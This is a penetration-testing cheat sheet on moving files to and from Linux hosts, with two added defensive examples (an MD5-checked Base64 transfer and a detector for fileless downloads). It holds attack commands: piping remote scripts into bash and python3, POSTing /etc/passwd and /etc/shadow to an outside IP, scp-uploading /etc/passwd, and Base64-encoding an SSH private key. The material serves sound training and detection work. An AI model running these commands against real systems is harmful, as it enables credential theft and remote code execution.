
Linux

BASE64

Check MD5 Hash

md5sum id_rsa

Encode

In this example we encode an SSH private key as a single-line Base64 string.

cat id_rsa | base64 -w 0; echo

Decode

echo -n 'justimaginethisissomerandomhashbecauseyoudontcareandidontcare=' | base64 -d > id_rsa
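The encode and decode steps above only prove the transfer worked if the hash is checked again on the receiving side. The following is an added example, not part of the original page: it round-trips a constructed sample file through Base64 and keeps the decoded copy only when its MD5 matches. The function names are hypothetical.

```shell
#!/bin/sh
# Added example (not from the original page): Base64 copy/paste transfer
# with an integrity check. All function names are hypothetical.

# Print FILE as a single-line Base64 string (same as `base64 -w 0`).
encode_file() {
    base64 -w 0 < "$1"
    echo
}

# Print the MD5 of FILE (hash only, no file name).
file_md5() {
    md5sum < "$1" | cut -d' ' -f1
}

# decode_verify B64 OUT EXPECTED_MD5
# Decode B64 into OUT and keep OUT only if its MD5 equals EXPECTED_MD5.
# Returns 0 on match, 1 on hash mismatch, 2 if the input is not valid Base64.
decode_verify() {
    local b64="$1" out="$2" expected="$3"
    # Key material must not be group/world readable, so create the file 0600.
    if ! (umask 077; printf '%s' "$b64" | base64 -d > "$out" 2>/dev/null); then
        rm -f "$out"
        return 2
    fi
    if [ "$(file_md5 "$out")" != "$expected" ]; then
        rm -f "$out"    # do not leave a truncated or altered file behind
        return 1
    fi
    return 0
}

# Demo on a constructed sample file (not a real key).
demo() {
    local dir sum b64
    dir=$(mktemp -d)
    printf 'constructed sample, not a real key\n' > "$dir/id_rsa"
    sum=$(file_md5 "$dir/id_rsa")
    b64=$(encode_file "$dir/id_rsa")
    decode_verify "$b64" "$dir/id_rsa.copy" "$sum" && echo "hash verified: $sum"
    rm -rf "$dir"
}
demo
```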

CURL

Regular Download

curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

Fileless Download

curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash

Multiple File Upload

curl -X POST https://13.13.13.13/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure

WGET

Regular Download

wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh

Fileless Download

wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3

Upload

The mechanism is similar to the Windows web upload and uses the uploadserver module:

sudo python3 -m pip install --user uploadserver

Secure HTTPS Web Server

  1. Create a Self-Signed Certificate

openssl req -x509 -out server.pem -keyout server.pem -newkey rsa:2048 -nodes -sha256 -subj '/CN=server'
  2. Start Web Server

The server is started from a new, empty directory so that it does not serve its own certificate and key.

mkdir https && cd https
sudo python3 -m uploadserver 443 --server-certificate /root/server.pem

Alternative Methods

Creating a Web Server with Python3

python3 -m http.server

Creating a Web Server with Python2.7

python2.7 -m SimpleHTTPServer

Creating a Web Server with PHP

php -S 0.0.0.0:8000

Creating a Web Server with Ruby

ruby -run -ehttpd . -p8000

Bash(/dev/tcp)

Connect to the Target Webserver

exec 3<>/dev/tcp/13.13.13.13/80

HTTP GET Request

echo -e "GET /LinEnum.sh HTTP/1.1\r\nHost: 13.13.13.13\r\nConnection: close\r\n\r\n" >&3

Print the Response

cat <&3
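The fileless patterns in the CURL, WGET and Bash (/dev/tcp) sections leave no payload on disk, so the command line itself is what a defender has to match on. The following is an added example, not part of the original page: it flags those three patterns in command-line audit records. The `uid=... cmd=...` record format, the function names and the sample lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): flag download-and-execute
# command lines that never write the payload to disk.
# The "uid=... cmd=..." record format is an assumption for illustration.

# A downloader piped straight into an interpreter, e.g. `curl URL | bash`.
PIPE_TO_INTERP='(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?((ba|da|z)?sh|python[0-9.]*|perl|ruby)([[:space:]]|$)'
# Bash network pseudo-device, e.g. `exec 3<>/dev/tcp/HOST/PORT`.
DEV_SOCKET='/dev/(tcp|udp)/[^/[:space:]]+/[0-9]+'

# Read records on stdin and print "LINENO:record" for each suspicious one.
flag_fileless() {
    grep -nE -e "$PIPE_TO_INTERP" -e "$DEV_SOCKET"
}

# Constructed sample records built from the commands on this page,
# plus two benign lines that must not be flagged.
sample_log() {
    cat <<'EOF'
uid=1000 cmd=curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
uid=1000 cmd=curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash
uid=1000 cmd=wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3
uid=1000 cmd=curl -s https://13.13.13.13/status | grep ok
uid=1000 cmd=exec 3<>/dev/tcp/13.13.13.13/80
uid=1000 cmd=scp /etc/passwd sreed@13.13.13.13:/home/plaintext/
EOF
}

# Prints records 2, 3 and 5; the regular download, the pipe into grep
# and the scp upload are left alone.
sample_log | flag_fileless
```

A regular download followed by a separate execution step is not matched here; correlating a file write with a later exec needs process and file telemetry rather than a single command line.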

SCP

SSH is a protocol that allows secure access to remote computers. The SCP utility uses the SSH protocol to transfer files.

Preparation

Enabling the SSH Server

sudo systemctl enable ssh

Starting the SSH Server

sudo systemctl start ssh

Checking for SSH Listening Port

netstat -lnpt

Download

scp sreed@13.13.13.13:/root/root.txt .

Upload

scp /etc/passwd sreed@13.13.13.13:/home/plaintext/